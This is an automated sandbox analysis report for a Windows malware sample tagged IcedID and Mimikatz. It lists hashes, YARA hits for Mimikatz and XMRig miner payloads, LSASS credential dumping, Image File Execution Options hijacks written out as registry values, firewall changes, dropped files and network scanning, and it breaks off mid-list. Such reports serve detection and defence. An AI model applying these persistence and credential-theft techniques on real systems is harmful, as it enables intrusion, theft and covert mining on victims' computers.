Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
13-01-2025 02:33
Behavioral task
behavioral1
Sample
2025-01-13_e5486dcf3693cdc92bc25a159420f058_hacktools_icedid_mimikatz.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
2025-01-13_e5486dcf3693cdc92bc25a159420f058_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2025-01-13_e5486dcf3693cdc92bc25a159420f058_hacktools_icedid_mimikatz.exe
-
Size
7.4MB
-
MD5
e5486dcf3693cdc92bc25a159420f058
-
SHA1
73bc52bf2a88be386cba6c79ea34c1d14c13301c
-
SHA256
800214865a5a87e5bcf09f8f7d6daee7c93926afd241111612486768ebde6ab3
-
SHA512
2fac23e44dac521803a1e98ca79938e4046229aa73ee274cf7c65f3b2c53e6da09d8aba7f3040c64a0fd0589a53825da2c0964d7682f0cba42eb5bdadda52412
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2124 created 556 2124 lgeptip.exe 17 -
Xmrig family
-
Contacts a large (27402) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral1/memory/2100-195-0x000000013F580000-0x000000013F6A0000-memory.dmp xmrig behavioral1/memory/2100-205-0x000000013F580000-0x000000013F6A0000-memory.dmp xmrig behavioral1/memory/2100-228-0x000000013F580000-0x000000013F6A0000-memory.dmp xmrig behavioral1/memory/2100-229-0x000000013F580000-0x000000013F6A0000-memory.dmp xmrig behavioral1/memory/2100-230-0x000000013F580000-0x000000013F6A0000-memory.dmp xmrig behavioral1/memory/2100-231-0x000000013F580000-0x000000013F6A0000-memory.dmp xmrig behavioral1/memory/2100-248-0x000000013F580000-0x000000013F6A0000-memory.dmp xmrig behavioral1/memory/2100-284-0x000000013F580000-0x000000013F6A0000-memory.dmp xmrig behavioral1/memory/2100-285-0x000000013F580000-0x000000013F6A0000-memory.dmp xmrig behavioral1/memory/2100-295-0x000000013F580000-0x000000013F6A0000-memory.dmp xmrig behavioral1/memory/2100-296-0x000000013F580000-0x000000013F6A0000-memory.dmp xmrig behavioral1/memory/2100-300-0x000000013F580000-0x000000013F6A0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 6 IoCs
resource yara_rule behavioral1/memory/2096-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral1/memory/2096-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral1/files/0x000800000001919c-5.dat mimikatz behavioral1/memory/1864-9-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral1/memory/1780-135-0x0000000000FC0000-0x00000000010AE000-memory.dmp mimikatz behavioral1/memory/2532-138-0x000000013FC60000-0x000000013FD4E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts lgeptip.exe File opened for modification C:\Windows\system32\drivers\etc\hosts lgeptip.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe lgeptip.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe lgeptip.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lgeptip.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe lgeptip.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lgeptip.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe lgeptip.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe lgeptip.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lgeptip.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lgeptip.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lgeptip.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lgeptip.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe lgeptip.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lgeptip.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe lgeptip.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe lgeptip.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lgeptip.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lgeptip.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lgeptip.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe lgeptip.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lgeptip.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lgeptip.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe lgeptip.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe lgeptip.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe lgeptip.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lgeptip.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lgeptip.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lgeptip.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe lgeptip.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe lgeptip.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe lgeptip.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lgeptip.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe lgeptip.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lgeptip.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lgeptip.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe lgeptip.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lgeptip.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe lgeptip.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lgeptip.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe lgeptip.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe lgeptip.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2316 netsh.exe 1036 netsh.exe -
Executes dropped EXE 18 IoCs
pid Process 1864 lgeptip.exe 2124 lgeptip.exe 1616 wpcap.exe 1224 ensatjbpg.exe 2532 vfshost.exe 2952 lgeptip.exe 1736 xohudmc.exe 644 ooeaya.exe 2404 rpuessgip.exe 2100 yerzvn.exe 2900 rpuessgip.exe 2892 rpuessgip.exe 2596 rpuessgip.exe 2192 rpuessgip.exe 1936 rpuessgip.exe 1972 rpuessgip.exe 2036 lgeptip.exe 2468 yqnmnukbh.exe -
Loads dropped DLL 24 IoCs
pid Process 2256 cmd.exe 2256 cmd.exe 1908 cmd.exe 1616 wpcap.exe 1616 wpcap.exe 1616 wpcap.exe 1616 wpcap.exe 1616 wpcap.exe 1704 cmd.exe 1224 ensatjbpg.exe 1224 ensatjbpg.exe 1780 cmd.exe 1780 cmd.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 2124 lgeptip.exe 708 cmd.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 17 ifconfig.me 18 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 12 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EC98FD874C34E9667158FBB7DEFBD82F lgeptip.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat lgeptip.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\ooeaya.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EC98FD874C34E9667158FBB7DEFBD82F lgeptip.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\ooeaya.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 lgeptip.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 lgeptip.exe -
resource yara_rule behavioral1/files/0x000500000001a48b-132.dat upx behavioral1/memory/2532-136-0x000000013FC60000-0x000000013FD4E000-memory.dmp upx behavioral1/memory/2532-138-0x000000013FC60000-0x000000013FD4E000-memory.dmp upx behavioral1/files/0x000500000001a4a0-143.dat upx behavioral1/files/0x000500000001a49b-162.dat upx behavioral1/memory/2404-166-0x000000013F9A0000-0x000000013F9FB000-memory.dmp upx behavioral1/memory/2124-170-0x0000000001990000-0x0000000001AB0000-memory.dmp upx behavioral1/memory/2100-171-0x000000013F580000-0x000000013F6A0000-memory.dmp upx behavioral1/memory/2404-176-0x000000013F9A0000-0x000000013F9FB000-memory.dmp upx behavioral1/memory/2900-182-0x000000013FC00000-0x000000013FC5B000-memory.dmp upx behavioral1/memory/2900-184-0x000000013FC00000-0x000000013FC5B000-memory.dmp upx behavioral1/memory/2892-190-0x000000013F850000-0x000000013F8AB000-memory.dmp upx behavioral1/memory/2892-192-0x000000013F850000-0x000000013F8AB000-memory.dmp upx behavioral1/memory/2124-193-0x0000000001990000-0x0000000001AB0000-memory.dmp upx behavioral1/memory/2100-195-0x000000013F580000-0x000000013F6A0000-memory.dmp upx behavioral1/memory/2596-200-0x000000013F560000-0x000000013F5BB000-memory.dmp upx behavioral1/memory/2596-203-0x000000013F560000-0x000000013F5BB000-memory.dmp upx behavioral1/memory/2100-205-0x000000013F580000-0x000000013F6A0000-memory.dmp upx behavioral1/memory/2192-209-0x000000013FB70000-0x000000013FBCB000-memory.dmp upx behavioral1/memory/2192-211-0x000000013FB70000-0x000000013FBCB000-memory.dmp upx behavioral1/memory/2124-215-0x0000000001990000-0x00000000019EB000-memory.dmp upx behavioral1/memory/1936-219-0x000000013FB10000-0x000000013FB6B000-memory.dmp upx behavioral1/memory/2124-223-0x0000000001990000-0x00000000019EB000-memory.dmp upx behavioral1/memory/1972-226-0x000000013F300000-0x000000013F35B000-memory.dmp upx behavioral1/memory/2100-228-0x000000013F580000-0x000000013F6A0000-memory.dmp upx behavioral1/memory/2100-229-0x000000013F580000-0x000000013F6A0000-memory.dmp upx behavioral1/memory/2100-230-0x000000013F580000-0x000000013F6A0000-memory.dmp upx behavioral1/memory/2100-231-0x000000013F580000-0x000000013F6A0000-memory.dmp upx behavioral1/memory/2100-248-0x000000013F580000-0x000000013F6A0000-memory.dmp upx behavioral1/memory/2100-284-0x000000013F580000-0x000000013F6A0000-memory.dmp upx behavioral1/memory/2100-285-0x000000013F580000-0x000000013F6A0000-memory.dmp upx behavioral1/memory/2100-295-0x000000013F580000-0x000000013F6A0000-memory.dmp upx behavioral1/memory/2100-296-0x000000013F580000-0x000000013F6A0000-memory.dmp upx behavioral1/memory/2100-300-0x000000013F580000-0x000000013F6A0000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\uvfsybaen\UnattendGC\specials\vimpcsvc.xml lgeptip.exe File created C:\Windows\knalbupn\svschost.xml lgeptip.exe File created C:\Windows\uvfsybaen\upbdrjv\swrpwe.exe lgeptip.exe File opened for modification C:\Windows\uvfsybaen\Corporate\log.txt cmd.exe File opened for modification C:\Windows\knalbupn\vimpcsvc.xml lgeptip.exe File created C:\Windows\uvfsybaen\spfyirlfq\Packet.dll lgeptip.exe File created C:\Windows\uvfsybaen\UnattendGC\specials\coli-0.dll lgeptip.exe File created C:\Windows\uvfsybaen\UnattendGC\specials\exma-1.dll lgeptip.exe File created C:\Windows\uvfsybaen\UnattendGC\specials\vimpcsvc.exe lgeptip.exe File created C:\Windows\knalbupn\spoolsrv.xml lgeptip.exe File created C:\Windows\uvfsybaen\Corporate\vfshost.exe lgeptip.exe File created C:\Windows\uvfsybaen\spfyirlfq\scan.bat lgeptip.exe File created C:\Windows\uvfsybaen\UnattendGC\svschost.xml lgeptip.exe File created C:\Windows\uvfsybaen\UnattendGC\specials\docmicfg.xml lgeptip.exe File created C:\Windows\uvfsybaen\UnattendGC\Shellcode.ini lgeptip.exe File created C:\Windows\uvfsybaen\spfyirlfq\ip.txt lgeptip.exe File created C:\Windows\uvfsybaen\spfyirlfq\yqnmnukbh.exe lgeptip.exe File created C:\Windows\uvfsybaen\UnattendGC\specials\trch-1.dll lgeptip.exe File created C:\Windows\uvfsybaen\UnattendGC\docmicfg.xml lgeptip.exe File opened for modification C:\Windows\knalbupn\spoolsrv.xml lgeptip.exe File created C:\Windows\uvfsybaen\UnattendGC\AppCapture32.dll lgeptip.exe File created C:\Windows\uvfsybaen\spfyirlfq\wpcap.dll lgeptip.exe File created C:\Windows\uvfsybaen\UnattendGC\specials\svschost.xml lgeptip.exe File created C:\Windows\knalbupn\docmicfg.xml lgeptip.exe File opened for modification C:\Windows\knalbupn\docmicfg.xml lgeptip.exe File created C:\Windows\uvfsybaen\UnattendGC\specials\docmicfg.exe lgeptip.exe File created C:\Windows\uvfsybaen\UnattendGC\vimpcsvc.xml lgeptip.exe File created C:\Windows\uvfsybaen\UnattendGC\schoedcl.xml lgeptip.exe File created C:\Windows\ime\lgeptip.exe lgeptip.exe File created C:\Windows\uvfsybaen\UnattendGC\specials\posh-0.dll lgeptip.exe File created C:\Windows\uvfsybaen\UnattendGC\specials\tibe-2.dll lgeptip.exe File created C:\Windows\uvfsybaen\UnattendGC\specials\zlib1.dll lgeptip.exe File created C:\Windows\uvfsybaen\spfyirlfq\wpcap.exe lgeptip.exe File created C:\Windows\uvfsybaen\UnattendGC\specials\tucl-1.dll lgeptip.exe File created C:\Windows\uvfsybaen\UnattendGC\specials\schoedcl.exe lgeptip.exe File created C:\Windows\uvfsybaen\UnattendGC\spoolsrv.xml lgeptip.exe File created C:\Windows\uvfsybaen\UnattendGC\specials\spoolsrv.xml lgeptip.exe File created C:\Windows\knalbupn\vimpcsvc.xml lgeptip.exe File created C:\Windows\knalbupn\lgeptip.exe 2025-01-13_e5486dcf3693cdc92bc25a159420f058_hacktools_icedid_mimikatz.exe File created C:\Windows\uvfsybaen\UnattendGC\specials\crli-0.dll lgeptip.exe File created C:\Windows\uvfsybaen\UnattendGC\specials\svschost.exe lgeptip.exe File created C:\Windows\knalbupn\schoedcl.xml lgeptip.exe File created C:\Windows\uvfsybaen\Corporate\mimidrv.sys lgeptip.exe File created C:\Windows\uvfsybaen\Corporate\mimilib.dll lgeptip.exe File created C:\Windows\uvfsybaen\UnattendGC\specials\libeay32.dll lgeptip.exe File opened for modification C:\Windows\knalbupn\lgeptip.exe 2025-01-13_e5486dcf3693cdc92bc25a159420f058_hacktools_icedid_mimikatz.exe File opened for modification C:\Windows\uvfsybaen\spfyirlfq\Packet.dll lgeptip.exe File created C:\Windows\uvfsybaen\UnattendGC\specials\cnli-1.dll lgeptip.exe File created C:\Windows\uvfsybaen\UnattendGC\specials\libxml2.dll lgeptip.exe File created C:\Windows\uvfsybaen\UnattendGC\specials\xdvl-0.dll lgeptip.exe File created C:\Windows\uvfsybaen\UnattendGC\specials\spoolsrv.exe lgeptip.exe File opened for modification C:\Windows\knalbupn\svschost.xml lgeptip.exe File created C:\Windows\uvfsybaen\UnattendGC\AppCapture64.dll lgeptip.exe File created C:\Windows\uvfsybaen\spfyirlfq\ensatjbpg.exe lgeptip.exe File created C:\Windows\uvfsybaen\UnattendGC\specials\ssleay32.dll lgeptip.exe File created C:\Windows\uvfsybaen\UnattendGC\specials\trfo-2.dll lgeptip.exe File opened for modification C:\Windows\knalbupn\schoedcl.xml lgeptip.exe File opened for modification C:\Windows\uvfsybaen\spfyirlfq\Result.txt yqnmnukbh.exe File created C:\Windows\uvfsybaen\UnattendGC\specials\ucl.dll lgeptip.exe File created C:\Windows\uvfsybaen\UnattendGC\specials\schoedcl.xml lgeptip.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1724 sc.exe 1728 sc.exe 3024 sc.exe 2468 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ooeaya.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language yqnmnukbh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lgeptip.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 